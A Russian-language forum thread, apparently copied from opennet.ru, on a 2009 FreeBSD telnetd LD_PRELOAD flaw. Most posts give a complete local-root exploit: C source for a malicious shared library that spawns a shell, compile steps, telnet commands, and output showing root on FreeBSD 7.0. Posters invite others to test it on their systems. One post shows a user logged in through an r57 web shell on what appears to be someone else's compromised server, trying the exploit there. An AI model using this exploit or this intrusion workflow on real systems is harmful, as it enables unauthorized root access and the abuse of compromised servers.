Инфомация взята с opennet.ru Первоисточник: http://lists.grok.org.uk/pipermail/full-disclosure/2009-February/067954.html сейчас под рукой нет bsd-системы, как с работы вернусь обязательно проверю. пробуем, отписываем, на каких ОС и версиях прокатило
Уязвимость чисто теоретическая, с тех пор как изобрели ssh, только самоубийцы будут держать на своих серверах демон telnetd. Уже лет 10 как telnetd никто не использует.
Во FreeBSD 6.2 пробовал - не прокатило зато в 7.0 на ура делал все как написано в источнике: 1. создаем файл hack.c Code: #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { FILE *f; setenv("LD_PRELOAD", "", 1); system("echo HACKED!!!;/bin/sh"); } 2. компилим Code: gcc -o hack.o -c hack.c -fPIC gcc -shared -Wl,-soname,lib.so.1 -o lib.so.1.0 hack.o -nostartfiles 3. перемещаем например сюда Code: mv lib.so.1.0 /tmp 4. проверяем текущего юзера Code: $id uid=1001(betakley) gid=1001(betakley) groups=1001(betakley),0(wheel) 5. набираем команду telnet и вводим Code: auth disable SRA environ define LD_PRELOAD /tmp/lib.so.1.0 open localhost 6. получаем Code: Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. FreeBSD/i386 (test) (ttyp1) HACKED!!! 7. проверяем Code: # id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) # uname -a FreeBSD test 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 [email protected]:/usr/obj/usr/src/sys/GENERIC i386 #
блин, на FreeBSD 4.7-RELEASE-p28 не катит ------------------------- nc big***.***.net 11*** Password:*** welcome to r57 shell Warning: no access to tty (Bad file descriptor). Thus no job control in this shell. big**** /usr/local/phpMyAdmin-2.10.0.2-all-languages> telnet auth disable SRA environ define LD_PRELOAD /tmp/libGLo.so.1.0 open localhost telnet> telnet> telnet> Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. FreeBSD/i386 (big***.r***.net) (ttyp1) login: -------------------------------------------------- Уже почти неделю с этим сервером мучаюсь
